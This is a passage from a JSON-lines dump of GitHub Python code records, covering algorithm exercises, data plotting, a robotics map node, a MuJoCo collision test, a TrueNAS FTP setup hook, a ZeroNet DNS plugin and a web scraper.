반복을 돌림\n cur_pos = queue.pop(0)\n for i in range(4): # 4방 탐색\n nr = cur_pos[0] + dr[i]\n nc = cur_pos[1] + dc[i]\n\n if not(0 <= nr < N and 0 <= nc < N): # 범위 밖\n continue\n if maze[nr][nc] == 3: # 도착\n return level\n if visited[nr][nc] == 0 and maze[nr][nc] == 0: # 가는 길\n visited[nr][nc] = 1\n queue.append([nr, nc])\n level += 1\n\n return 0\n\n\n\n\nfor tc in range(1, int(input())+1):\n N = int(input())\n\n maze = [list(map(int, input())) for _ in range(N)]\n \n # 시작 점 찾기\n for i in range(N):\n for j in range(N):\n if maze[i][j] == 2:\n ans = bfs(i,j)\n\n print(\"#{} {}\".format(tc, ans))","repo_name":"alpaka99/algorithm","sub_path":"algorithm_class/5105_미로의 거리/s1.py","file_name":"s1.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"12002121246","text":"class Solution(object):\n def numIdenticalPairs(self, nums):\n counter=0\n for i in range(len(nums)):\n j=0\n while j 3:\n sun_x = 0\n start = 0\n # End if\n # End if\n #screen.blit(image, (220, 165)) # House\n pygame.display.flip() # flip the display\n clock.tick(180) # tick the clock over\n# End while\n\npygame.quit()\n","repo_name":"JamesonW0/WangJ-Python","sub_path":"PyGame/House of the Rising Sun/house.py","file_name":"house.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"19266999044","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\nlogs = 
pd.read_csv('Well_Tauk_AfterProcessing.csv')\r\nprint(logs.columns)\r\nprint(\"min\", logs.Depth.min())\r\nprint(\"max\", logs.Depth.max())\r\nprint(\"avg\", logs.DT.mean())\r\n\r\nlogs = logs[(logs.Depth >= 6400) & (logs.Depth <= 6800)]\r\n\r\nsand_cutoff = 0.50\r\nbrine_sand = ((logs.Vshale <= sand_cutoff) & (logs.SW >= 0.9))\r\noil_sand = ((logs.Vshale <= sand_cutoff) & (logs.SW < 0.9))\r\nshale = (logs.Vshale > sand_cutoff)\r\n\r\ntemp_lfc = np.zeros(np.shape(logs.Vshale))\r\ntemp_lfc[brine_sand.values] = 1 # LFC will be 1 when ssb (brine sand flag) is True\r\ntemp_lfc[oil_sand.values] = 2 # LFC will be 2 when sso (oil sand flag) is True\r\ntemp_lfc[shale.values] = 4 # LFC will be 4 when sh (shale flag) is True\r\nlogs['LFC'] = temp_lfc # Copy the temporary log temp_lfc into the DataFrame with name `LFC`\r\n\r\nlogs.to_csv('welltaukfacies_lfc.csv',index=False) # save the data for use in Part 2\r\nprint(np.shape(logs.Vshale))\r\n\r\nstring = \"brine sst={0}, oil sst={1}, shale={2}\"\r\ndata = (np.count_nonzero(brine_sand),\r\n np.count_nonzero(oil_sand),\r\n np.count_nonzero(shale))\r\nprint(string.format(*data))\r\nprint(\"LFC min: {0}, LFC max: {1}\".format(logs.LFC.min(), logs.LFC.max()))\r\n\r\nimport matplotlib.colors as colors\r\n# 0=undef 1=bri 2=oil 3=gas 4=shale\r\nccc = ['#B3B3B3','blue','green','red','#996633',]\r\ncmap_facies = colors.ListedColormap(ccc[0:len(ccc)], 'indexed')\r\n\r\nztop = 6400; zbot=6800\r\nll=logs[(logs.Depth>=ztop) & (logs.Depth<=zbot)]\r\n\r\ncluster=np.repeat(np.expand_dims(ll['LFC'].values,1), 100, 1)\r\n\r\nf, ax = plt.subplots(nrows=1, ncols=4, figsize=(8, 12))\r\nax[0].plot(ll.Vshale, ll.Depth, '-g', label='Vsh')\r\nax[0].plot(ll.SW, ll.Depth, '-b', label='Sw')\r\nax[1].plot(ll.PhieTotal, ll.Depth, '-k', label='phi')\r\nax[1].plot(ll.NPHI, ll.Depth, '-', color='0.5')\r\nax[2].plot(ll.Vp0Vs, ll.Depth, '-', color='0.5')\r\nim=ax[3].imshow(cluster, interpolation='none', aspect='auto',cmap=cmap_facies,vmin=0,vmax=4)\r\nax[1].fill_betweenx(ll.Depth, ll.PhieTotal,ll.NPHI , where=(ll.PhieTotal >= ll.NPHI), color='orange')\r\nax[1].fill_betweenx(ll.Depth, ll.PhieTotal, ll.NPHI, where=(ll.PhieTotal <= ll.NPHI), color='blue')\r\ny2 = ll.Vshale\r\ny1 = y2 * 0 + 0.5\r\nax[0].fill_betweenx(ll.Depth, y1, y2, where=(y1 >= y2), color='gold', linewidth=0)\r\nax[0].fill_betweenx(ll.Depth, y1, y2, where=(y1 <= y2), color='lime', linewidth=0)\r\ncbar = plt.colorbar(im, ax=ax[3])\r\ncbar.set_label('0=undef,1=brine,2=oil,3=gas,4=shale')\r\ncbar.set_ticks(range(0,4+1)); cbar.set_ticklabels(range(0,4+1))\r\ncbar.set_label((12*' ').join(['undef', 'ss brine', 'ss oil', 'ss gas', 'shale']))\r\ncbar.set_ticks(range(0,1)); cbar.set_ticklabels('')\r\n\r\nfor i in range(len(ax)-1):\r\n ax[i].set_ylim(ztop,zbot)\r\n ax[i].invert_yaxis()\r\n ax[i].grid()\r\n ax[i].locator_params(axis='x', nbins=4)\r\nax[0].legend(fontsize='small', loc='lower right')\r\nax[0].set_xlabel(\"Vcl & Sw\"), ax[0].set_xlim(-.1,1.1)\r\nax[1].set_xlabel(\"Density & Nphi\")\r\nax[2].set_xlabel(\"Vp/Vs\"),\r\nax[3].set_xlabel('LFC')\r\nax[1].set_yticklabels([]); ax[2].set_yticklabels([]); ax[3].set_yticklabels([]); ax[3].set_xticklabels([])\r\n\r\nplt.show()","repo_name":"SWahidatulhusna/Fluid-Replacement-Model-Rock-Physics","sub_path":"WELLFACIESPREPROS.py","file_name":"WELLFACIESPREPROS.py","file_ext":"py","file_size_in_byte":3190,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"20"} +{"seq_id":"25431787628","text":"\n\ndef get_input(filename):\n with 
open(filename) as file:\n lines = file.read().splitlines()\n return int(lines[0]), [int(value) for value in lines[1].split(',') if value.isdigit()]\n\n\ndef main():\n earliest, codes = get_input('input.txt')\n delta = max(codes)\n mods = [code - earliest % code for code in codes]\n best = codes[mods.index(min(mods))]\n print(best * min(mods))\n # value = codes[]\n # print(codes)\n\n\nmain()\n","repo_name":"zackjohnson298/AdventOfCode","sub_path":"2020/Day13/Part1.py","file_name":"Part1.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"41807434405","text":"\"\"\"\n A simple python script that contains all the helper/util functions. This functions can be used by other scripts.\n\"\"\"\nimport json\nimport os\nimport csv\nfrom operator import itemgetter\nfrom datetime import datetime\n\ndef loadAndConvertJSONData(fname):\n\t\"\"\"\n\t This function reads a json file as input and convert it to a python object. It returns a list of dictionaries\n\t\"\"\"\n\tpyDataList=[]\n\tfile=open(fname)\n\tfor jsonText in file:\n\t\tjsonToPy=json.loads(jsonText)\n\t\tpyDataList.append(jsonToPy)\n\tfile.close()\n\treturn pyDataList\n\ndef convertPyToJson(pyData):\n\t\"\"\"\n\t This function takes a python object (List, Dict, Set, Boolean, String, Integer) and returns an equivalent json object \n\t\"\"\"\n\treturn json.dumps(pyData)\n\ndef getAbsFileName(fname):\n\tfileAbsPath=os.path.abspath(fname)\n\treturn fileAbsPath\n\ndef convertToCSV(dataList, fname):\n\tkey=[]\n\tf = csv.writer(open(fname+\".csv\", \"w\"))\n\t\n\t#Write CSV Header, If you dont need that, remove this line\n\tfor k in dataList[0].keys():\n\t\tkey.append(k)\n\tf.writerow(key)\n\n\t#Write the data to csv\n\tfor dataDict in dataList:\n\t\tvalue=[]\n\t\tfor v in dataDict.values():\n\t\t\tvalue.append(v)\n\t\tf.writerow(value)\n\tprint(fname+\".csv\", \"successfully created\")\n \n\ndef sortValuesDesc(dataDict, k):\n\t\"\"\"\n\t\tsort the dictionary by value, in descending order and return the k top records\n\t\"\"\"\n\tsortedByValue=sorted(dataDict.items(),key=itemgetter(1),reverse=True)\n\treturn sortedByValue[:k] # return the top k terms and their frequencies\n\ndef calculateAverage(T,C):\n\treturn T/C\n\ndef writeDataToJSON(fname, headers, data):\n\t\n\tf = csv.writer(open(fname+\".csv\", \"w\"))\n\t\n\t#Write CSV Header, If you dont need that, remove this line\n\tf.writerow(headers)\n\n\t#Write the data to csv\n\tfor rec in data:\n\t\tf.writerow(rec)\n\n\tprint(fname+\".csv\", \"successfully created\")\n\t\ndef bucketedDate(dateStr, bucket):\n\tformate=\"%Y-%m-%d\"\n\tdateObj=datetime.strptime(dateStr, formate)\n\tbucketType={'day': dateObj.day, 'month': dateObj.month, 'year': dateObj.year, 'quarter': quarter(dateObj), 'semester': semester(dateObj)}\n\treturn bucketType[bucket]\n\ndef quarter(dateObj):\n\t\"\"\" \n\t\tWrong Implementation\n\t\"\"\"\n\tyear=dateObj.year\n\tmonth=dateObj.month\n\tif 1<= month <= 3:\n\t\treturn str(year)+'-Q1'\n\telif 4<= month <=6:\n\t\treturn str(year)+'-Q2'\n\telif 7<= month <=9:\n\t\treturn str(year)+'-Q3'\n\telif 10<= month <=12:\n\t\treturn str(year)+'-Q4'\n\telse:\n\t\treturn \"ERROR - Invalid quarter\"\n\ndef semester(dateObj):\n\t\"\"\"\n\t\tWrong Implementation\n\t\"\"\"\n\tyear=dateObj.year\n\tmonth=dateObj.month\n\tif 1<= month <= 4:\n\t\treturn str(year)+'-S1'\n\telif 5<= month <=8:\n\t\treturn str(year)+'-S2'\n\telif 9<= month <=12:\n\t\treturn str(year)+'-S3'\n\telse:\n\t\treturn \"ERROR 
- Invalid semester\"\n\n","repo_name":"mehulgupta29/YelpDataChallenge","sub_path":"scripts/old_scripts/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"10972604623","text":"class Solution:\n # A method of splitting an integer into its contituent digits and returns\n # them as a list. From some testing, it seems to be slower than the string\n # conversion method below. On the other hand, this is probably more\n # portable as not every language lets you swap between strings and ints\n # so easily\n def int_split(self, num: int) -> list:\n units = []\n digit = 10\n while num != 0:\n temp = num % digit\n num -= temp\n temp = temp / (digit / 10)\n units.append(int(temp))\n digit *= 10\n return units\n\n def split_sum(self, num: int) -> int:\n temp = list(str(num))\n for i in range(len(temp)):\n x = int(temp[i])\n temp[i] = x * x\n return sum(temp)\n\n def isHappy(self, n: int) -> bool:\n values = []\n while n not in values:\n values.append(n)\n n = self.split_sum(n)\n if n == 1:\n return True\n return False\n","repo_name":"adubois85/coding_challenge_websites","sub_path":"LeetCode/1-1000/201-300/201-225/202. Happy Number/solution-python.py","file_name":"solution-python.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"4899985936","text":"import config\n\n\nclass Command:\n \"\"\"\n Command superclass, defining how a command should be structured.\n \"\"\"\n\n def __init__(self, name):\n \"\"\"\n Three values should be initialized during initialization.\n :param name: A string detailing which section of the localization file contains the command text.\n \"\"\"\n self.name = name\n self.call = config.localization[self.name]['commands']\n self.description = config.localization[self.name]['description']\n if 'parameters' in config.localization[self.name]:\n self.parameters = config.localization[self.name]['parameters']\n else:\n self.parameters = config.localization['no_params']\n # self.call = call\n # self.description = description\n # self.parameters = parameters\n\n def __str__(self):\n \"\"\"\n As a string, the command should give an explanation of how to call it, what parameters it takes,\n and a description of what it does.\n \"\"\"\n return config.localization['command_skeleton'].format(self.get_call_string(),\n self.description,\n self.parameters)\n\n def get_call_string(self):\n \"\"\"\n Helper method to convert the call list to a string.\n :return: A string containing the list of possible calls the command responds to.\n \"\"\"\n result = \"\"\n for item in self.call:\n if result:\n result += \", \"\n result += config.configuration['sign'] + item\n return result\n\n def in_call(self, command):\n \"\"\"\n Method for determining if a specific string would trigger this command. Can be overwritten.\n :param command:\n :return:\n \"\"\"\n return command in self.call\n\n def execute(self, param, message, system):\n \"\"\"\n Method to be implemented by the class. 
Executes the actual command when it's calledw.\n :param param: The parameters given by the user.\n :param message: The message meta-data, including who sent the command.\n :param system: The system object, for accessing different managers.\n :return:\n \"\"\"\n raise NotImplementedError\n","repo_name":"LogicalFish/DiscordBot","sub_path":"python/commands/command_superclass.py","file_name":"command_superclass.py","file_ext":"py","file_size_in_byte":2315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"8515935046","text":"from typing import List\n\n\nclass Solution(object):\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n for i in range(len(nums) - 1):\n for j in range(i + 1, len(nums)):\n if nums[i] + nums[j] == target:\n return [i, j]\n\n def twoSum_hashTable(self, nums: List[int], target: int) -> List[int]:\n hashmap = {}\n for i in range(len(nums)):\n complement = target - nums[i]\n if complement in hashmap:\n return sorted([i, hashmap[complement]])\n hashmap[nums[i]] = i\n\n\nif __name__ == '__main__':\n sol = Solution()\n print(sol.twoSum(nums=[2, 7, 11, 15], target=9))\n print(sol.twoSum(nums=[3, 2, 4], target=6))\n print(sol.twoSum(nums=[3, 3], target=6))\n print(sol.twoSum_hashTable(nums=[2, 7, 11, 15], target=9))\n print(sol.twoSum_hashTable(nums=[3, 2, 4], target=6))\n print(sol.twoSum_hashTable(nums=[3, 3], target=6))\n","repo_name":"Engineering-Excellence/Problem-Solving","sub_path":"LeetCode/src/easy/py/LeetCode_1_TwoSum.py","file_name":"LeetCode_1_TwoSum.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"37713343084","text":"import dataclasses\n\nfrom absl.testing import absltest\nfrom absl.testing import parameterized\nimport jax\nimport mujoco\nfrom mujoco import mjx\nfrom mujoco.mjx._src import test_util\n# pylint: disable=g-importing-member\nfrom mujoco.mjx._src.types import Contact\n# pylint: enable=g-importing-member\nimport numpy as np\n\n\ndef _assert_attr_eq(mjx_d, mj_d, attr, name, atol):\n if attr == 'efc_address':\n # we do not test efc_address since it gets set in constraint logic\n return\n err_msg = f'mismatch: {attr} in run: {name}'\n mjx_d, mj_d = getattr(mjx_d, attr), getattr(mj_d, attr)\n if attr == 'frame':\n mj_d = mj_d.reshape((-1, 3, 3))\n if mjx_d.shape != mj_d.shape:\n raise AssertionError(f'{attr} shape mismatch: {mjx_d.shape}, {mj_d.shape}')\n np.testing.assert_allclose(mjx_d, mj_d, err_msg=err_msg, atol=atol)\n\n\nclass CollisionDriverIntegrationTest(parameterized.TestCase):\n\n @parameterized.parameters(list(range(256)))\n def test_collision_driver(self, seed):\n enable_contact = False if seed == 0 else True\n mjcf = test_util.create_mjcf(\n seed,\n body_pos=(0.0, 0.0, 0.14),\n disable_actuation_pct=100,\n root_always_free=True,\n min_trees=1,\n max_trees=5,\n max_tree_depth=1,\n enable_contact=enable_contact,\n )\n\n m = mujoco.MjModel.from_xml_string(mjcf)\n mx = mjx.device_put(m)\n d = mujoco.MjData(m)\n dx = mjx.device_put(d)\n\n mujoco.mj_step(m, d)\n collision_jit_fn = jax.jit(mjx.collision)\n kinematics_jit_fn = jax.jit(mjx.kinematics)\n dx = kinematics_jit_fn(mx, dx)\n dx = collision_jit_fn(mx, dx)\n\n if not d.contact.geom1.shape[0]:\n self.assertTrue((dx.contact.dist > 0).all())\n return # no contacts to test\n\n # re-order MJX contacts to match MJ order\n idx_mj = list(zip(d.contact.geom1, d.contact.geom2))\n idx_mjx = list(zip(dx.contact.geom1, 
dx.contact.geom2))\n idx_mjx = [tuple(np.array(i)) for i in idx_mjx]\n self.assertSequenceEqual(set(idx_mjx), set(idx_mj))\n idx = sorted(range(len(idx_mj)), key=lambda x: idx_mj.index(idx_mjx[x]))\n\n mjx_contact = jax.tree_map(\n lambda x: x.take(np.array(idx), axis=0), dx.contact\n )\n mjx_contact = mjx_contact.replace(dim=mjx_contact.dim[idx])\n for field in dataclasses.fields(Contact):\n _assert_attr_eq(mjx_contact, d.contact, field.name, seed, 1e-7)\n\n\nif __name__ == '__main__':\n absltest.main()\n","repo_name":"deepmind/mujoco","sub_path":"mjx/mujoco/mjx/integration_test/collision_driver_test.py","file_name":"collision_driver_test.py","file_ext":"py","file_size_in_byte":2400,"program_lang":"python","lang":"en","doc_type":"code","stars":5900,"dataset":"github-code","pt":"20"} +{"seq_id":"69794044211","text":"#!/usr/bin/python3\n\nimport rospy\nimport time\nfrom std_msgs.msg import String\nfrom sensor_msgs.msg import LaserScan\nfrom fremenarray.msg import FremenArrayActionGoal, FremenArrayGoal, FremenArrayAction\nfrom geometry_msgs.msg import PoseArray, PointStamped\nfrom tf.transformations import euler_from_quaternion, quaternion_from_euler\nfrom nav_msgs.msg import OccupancyGrid\nimport actionlib\nimport math\nimport numpy as np\nimport tf\nfrom stefmap_ros.msg import STeFMapMsg,STeFMapCellMsg\nfrom stefmap_ros.srv import GetSTeFMap, UpdateSTeFMap\n\nclass STeFmap_node_offline(object):\n\n\tdef __init__(self):\n\t\t#parameters\n\t\tself.grid_size = rospy.get_param('~grid_size',1)#meters\t\t\n\t\tself.x_min = rospy.get_param('~x_min',-50)#meters\n\t\tself.x_max = rospy.get_param('~x_max',50) #meters\n\t\tself.y_min = rospy.get_param('~y_min',-50)#meters\n\t\tself.y_max = rospy.get_param('~y_max',50) #meters\n\t\tself.num_bins = rospy.get_param('~num_bins',8) #bins dividing the circumference\n\t\tself.frame_id = rospy.get_param('~frame_id',\"/map\")\n\n\t\t# initialize visibility map\n\t\tself.width = int((self.x_max-self.x_min)/self.grid_size) ## [cells]\n\t\tself.height = int((self.y_max-self.y_min)/self.grid_size) ## [cells]\n\n\t\t# connect to fremenarray\n\t\trospy.loginfo(\"waiting for FremenArray.....\")\n\t\tself.fremenarray_client = actionlib.SimpleActionClient('/fremenarray', FremenArrayAction)\n\t\tself.fremenarray_client.wait_for_server()\n\t\trospy.loginfo(\"FremenArray ready!\")\n\n\t\t# initiliatize stefmap\n\t\trospy.loginfo(\"Initializing STeF-map.....\")\n\t\tself.bin_counts_matrix = np.ones([self.width,self.height,self.num_bins])*-1 #initialize cells as unexplored/unknow\n\t\tself.bin_counts_matrix_accumulated = np.zeros([self.width,self.height,self.num_bins])\n\t\tself.entropy_map_store = []\n\n\t\t# create stef map service and topic\n\t\tget_stefmap_service = rospy.Service('get_stefmap', GetSTeFMap, self.handle_GetSTeFMap)\n\t\tself.stefmap_pub = rospy.Publisher('/stefmap', STeFMapMsg, queue_size=1, latch=True)\n\n\t\tself.run()\n\n\tdef handle_GetSTeFMap(self,req):\n\t\tmSTefMap = STeFMapMsg()\n\t\tmSTefMap.header.stamp = rospy.get_rostime() \n\t\tmSTefMap.header.frame_id = self.frame_id\n\t\tmSTefMap.prediction_time = req.prediction_time\n\t\tmSTefMap.x_min = self.x_min\n\t\tmSTefMap.x_max = self.x_max\n\t\tmSTefMap.y_min = self.y_min\n\t\tmSTefMap.y_max = self.y_max\n\t\tmSTefMap.cell_size = self.grid_size\n\t\tmSTefMap.rows = self.width\n\t\tmSTefMap.columns = self.height\n\n\t\tprint(\"STeFMap sent!\")\n\t\treturn mSTefMap\n\n\tdef run(self):\t\t\t\t\n\t\trospy.spin()\n\nif __name__ == '__main__':\n\trospy.init_node('stefmap_node', anonymous=True)\n\tstef = 
STeFmap_node_offline()\n","repo_name":"OrebroUniversity/mod_ros","sub_path":"stefmap_ros/src/stefmap_node_dummy.py","file_name":"stefmap_node_dummy.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"25272276094","text":"import os\n\nfrom middlewared.utils import osc\n\n\ndef setup(middleware):\n ftp = middleware.call_sync(\"ftp.config\")\n\n os.makedirs(\"/var/log/proftpd\", exist_ok=True)\n os.makedirs(\"/var/run/proftpd\", exist_ok=True)\n\n open(\"/var/run/proftpd/proftpd.delay\", \"w+\").close()\n open(\"/etc/hosts.allow\", \"w+\").close()\n open(\"/etc/hosts.deny\", \"w+\").close()\n\n if osc.IS_LINUX:\n filters = [[\"builtin\", \"=\", True], [\"username\", \"!=\", \"ftp\"]]\n if ftp[\"rootlogin\"]:\n filters.append([\"username\", \"!=\", \"root\"])\n\n ftpusers = [user[\"username\"] for user in middleware.call_sync(\"user.query\", filters)]\n\n with open(\"/etc/ftpusers\", \"w\") as f:\n f.write(\"\\n\".join(ftpusers) + \"\\n\")\n\n open(\"/var/log/wtmp\", \"w+\").close()\n os.chmod(\"/var/log/wtmp\", 0o644)\n\n with open(\"/var/run/proftpd/proftpd.motd\", \"w\") as f:\n if ftp[\"banner\"]:\n f.write(ftp[\"banner\"] + \"\\n\")\n else:\n product_name = middleware.call_sync(\"system.product_name\")\n f.write(f\"Welcome to {product_name} FTP Server\\n\")\n\n\ndef render(service, middleware):\n setup(middleware)\n","repo_name":"truenas/middleware","sub_path":"src/middlewared/middlewared/etc_files/local/proftpd.py","file_name":"proftpd.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":2144,"dataset":"github-code","pt":"20"} +{"seq_id":"1516321107","text":"from collections import defaultdict\ndef rod(num, x):\n if num % x == 0:\n return num//x\n else:\n return (num//x) + 1\n\ndef solution(fees, records):\n answer = []\n park_sum = defaultdict(int)\n park = dict()\n for r in records:\n t, n, h = r.split()\n\n if h == \"IN\":\n park[n] = t\n elif h == \"OUT\":\n time = (int(t[:2]) - int(park[n][:2])) * 60 + (int(t[-2:]) - int(park[n][-2:]))\n park_sum[n] += time\n del park[n]\n if park:\n for k, v in park.items():\n time = (23 - int(v[:2])) * 60 + (59 - int(v[-2:]))\n park_sum[k] += time\n numbers = sorted(list(park_sum.keys()))\n park_ssum = {k: park_sum[k] for k in numbers}\n for n, t in park_ssum.items():\n if t <= fees[0]:\n answer.append(fees[1])\n else:\n fee = fees[1] + rod((t- fees[0]), fees[2])*fees[3]\n answer.append((fee))\n return answer","repo_name":"potatowon/codingtest","sub_path":"프로그래머스/lv2/92341. 
주차 요금 계산/주차 요금 계산.py","file_name":"주차 요금 계산.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"20838160795","text":"import logging, json, os, re, sys, time\nimport gevent\nfrom Plugin import PluginManager\nfrom Config import config\nfrom util import Http\nfrom Debug import Debug\n\nallow_reload = False # No reload supported\n\nlog = logging.getLogger(\"DnschainPlugin\")\n\n@PluginManager.registerTo(\"SiteManager\")\nclass SiteManagerPlugin(object):\n\tdns_cache_path = \"%s/dns_cache.json\" % config.data_dir\n\tdns_cache = None\n\n\t# Checks if its a valid address\n\tdef isAddress(self, address):\n\t\tif self.isDomain(address): \n\t\t\treturn True\n\t\telse:\n\t\t\treturn super(SiteManagerPlugin, self).isAddress(address)\n\n\n\t# Return: True if the address is domain\n\tdef isDomain(self, address):\n\t\treturn re.match(r\"(.*?)([A-Za-z0-9_-]+\\.[A-Za-z0-9]+)$\", address)\n\n\n\t# Load dns entries from data/dns_cache.json\n\tdef loadDnsCache(self):\n\t\tif os.path.isfile(self.dns_cache_path):\n\t\t\tself.dns_cache = json.load(open(self.dns_cache_path))\n\t\telse:\n\t\t\tself.dns_cache = {}\n\t\tlog.debug(\"Loaded dns cache, entries: %s\" % len(self.dns_cache))\n\n\n\t# Save dns entries to data/dns_cache.json\n\tdef saveDnsCache(self):\n\t\tjson.dump(self.dns_cache, open(self.dns_cache_path, \"wb\"), indent=2)\n\n\n\t# Resolve domain using dnschain.net\n\t# Return: The address or None\n\tdef resolveDomainDnschainNet(self, domain):\n\t\ttry:\n\t\t\tmatch = self.isDomain(domain)\n\t\t\tsub_domain = match.group(1).strip(\".\")\n\t\t\ttop_domain = match.group(2)\n\t\t\tif not sub_domain: sub_domain = \"@\"\n\t\t\taddress = None\n\t\t\twith gevent.Timeout(5, Exception(\"Timeout: 5s\")):\n\t\t\t\tres = Http.get(\"https://api.dnschain.net/v1/namecoin/key/%s\" % top_domain).read()\n\t\t\t\tdata = json.loads(res)[\"data\"][\"value\"]\n\t\t\t\tif \"zeronet\" in data:\n\t\t\t\t\tfor key, val in data[\"zeronet\"].items():\n\t\t\t\t\t\tself.dns_cache[key+\".\"+top_domain] = [val, time.time()+60*60*5] # Cache for 5 hours\n\t\t\t\t\tself.saveDnsCache()\n\t\t\t\t\treturn data[\"zeronet\"].get(sub_domain)\n\t\t\t# Not found\n\t\t\treturn address\n\t\texcept Exception as err:\n\t\t\tlog.debug(\"Dnschain.net %s resolve error: %s\" % (domain, Debug.formatException(err)))\n\n\n\t# Resolve domain using dnschain.info\n\t# Return: The address or None\n\tdef resolveDomainDnschainInfo(self, domain):\n\t\ttry:\n\t\t\tmatch = self.isDomain(domain)\n\t\t\tsub_domain = match.group(1).strip(\".\")\n\t\t\ttop_domain = match.group(2)\n\t\t\tif not sub_domain: sub_domain = \"@\"\n\t\t\taddress = None\n\t\t\twith gevent.Timeout(5, Exception(\"Timeout: 5s\")):\n\t\t\t\tres = Http.get(\"https://dnschain.info/bit/d/%s\" % re.sub(r\"\\.bit$\", \"\", top_domain)).read()\n\t\t\t\tdata = json.loads(res)[\"value\"]\n\t\t\t\tfor key, val in data[\"zeronet\"].items():\n\t\t\t\t\tself.dns_cache[key+\".\"+top_domain] = [val, time.time()+60*60*5] # Cache for 5 hours\n\t\t\t\tself.saveDnsCache()\n\t\t\t\treturn data[\"zeronet\"].get(sub_domain)\n\t\t\t# Not found\n\t\t\treturn address\n\t\texcept Exception as err:\n\t\t\tlog.debug(\"Dnschain.info %s resolve error: %s\" % (domain, Debug.formatException(err)))\n\n\n\t# Resolve domain\n\t# Return: The address or None\n\tdef resolveDomain(self, domain):\n\t\tdomain = domain.lower()\n\t\tif self.dns_cache == None:\n\t\t\tself.loadDnsCache()\n\t\tif domain.count(\".\") < 2: # Its a topleved 
request, prepend @. to it\n\t\t\tdomain = \"@.\"+domain\n\n\t\tdomain_details = self.dns_cache.get(domain)\n\t\tif domain_details and time.time() < domain_details[1]: # Found in cache and its not expired\n\t\t\treturn domain_details[0]\n\t\telse:\n\t\t\t# Resovle dns using dnschain\n\t\t\tthread_dnschain_info = gevent.spawn(self.resolveDomainDnschainInfo, domain)\n\t\t\tthread_dnschain_net = gevent.spawn(self.resolveDomainDnschainNet, domain)\n\t\t\tgevent.joinall([thread_dnschain_net, thread_dnschain_info]) # Wait for finish\n\n\t\t\tif thread_dnschain_info.value and thread_dnschain_net.value: # Booth successfull\n\t\t\t\tif thread_dnschain_info.value == thread_dnschain_net.value: # Same returned value\n\t\t\t\t\treturn thread_dnschain_info.value \n\t\t\t\telse:\n\t\t\t\t\tlog.error(\"Dns %s missmatch: %s != %s\" % (domain, thread_dnschain_info.value, thread_dnschain_net.value))\n\n\t\t\t# Problem during resolve\n\t\t\tif domain_details: # Resolve failed, but we have it in the cache\n\t\t\t\tdomain_details[1] = time.time()+60*60 # Dont try again for 1 hour\n\t\t\t\treturn domain_details[0]\n\t\t\telse: # Not found in cache\n\t\t\t\tself.dns_cache[domain] = [None, time.time()+60] # Don't check again for 1 min\n\t\t\t\treturn None\n\n\n\t# Return or create site and start download site files\n\t# Return: Site or None if dns resolve failed\n\tdef need(self, address, all_file=True):\n\t\tif self.isDomain(address): # Its looks like a domain\n\t\t\taddress_resolved = self.resolveDomain(address)\n\t\t\tif address_resolved:\n\t\t\t\taddress = address_resolved\n\t\t\telse:\n\t\t\t\treturn None\n\t\t\n\t\treturn super(SiteManagerPlugin, self).need(address, all_file)\n\n\n\t# Return: Site object or None if not found\n\tdef get(self, address):\n\t\tif self.sites == None: # Not loaded yet\n\t\t\tself.load()\n\t\tif self.isDomain(address): # Its looks like a domain\n\t\t\taddress_resolved = self.resolveDomain(address)\n\t\t\tif address_resolved: # Domain found\n\t\t\t\tsite = self.sites.get(address_resolved)\n\t\t\t\tif site:\n\t\t\t\t\tsite_domain = site.settings.get(\"domain\")\n\t\t\t\t\tif site_domain != address:\n\t\t\t\t\t\tsite.settings[\"domain\"] = address\n\t\t\telse: # Domain not found\n\t\t\t\tsite = self.sites.get(address)\n\n\t\telse: # Access by site address\n\t\t\tsite = self.sites.get(address)\n\t\treturn site\n\n","repo_name":"HelloZeroNet/ZeroNet","sub_path":"plugins/disabled-Dnschain/SiteManagerPlugin.py","file_name":"SiteManagerPlugin.py","file_ext":"py","file_size_in_byte":5145,"program_lang":"python","lang":"en","doc_type":"code","stars":18056,"dataset":"github-code","pt":"20"} +{"seq_id":"223350997","text":"# -*- coding: utf-8 -*-\n\nfrom bs4 import BeautifulSoup\nimport json\nimport glob\nimport geocoder\n\nfileList = glob.glob('html/tokyo/*.html')\n\njsonData = []\n# fileList = ['html/tokyo/data271.html']\nfor html in fileList:\n f = open(html, 'r')\n soup = BeautifulSoup(f.read(), \"lxml\")\n f.close()\n\n\n rawDartslive = soup.select(\".icn-shop-no\")\n if rawDartslive:\n dartslive = rawDartslive[0].text.replace('台', '')\n else:\n dartslive = 0\n\n name = soup.select(\".shop-info dl dd\")[0].text\n\n rawInformation = soup.select(\".shopInfo-txt-area p\")\n if rawInformation:\n information = rawInformation[0].text\n else:\n information = ''\n\n address = ''\n tel = ''\n station = ''\n time = ''\n holiday = ''\n url = ''\n tableColumns = soup.select(\"div.shopAccess table tr\")\n for tr in tableColumns:\n th = tr.select(\"th\")[0].text\n td = ' 
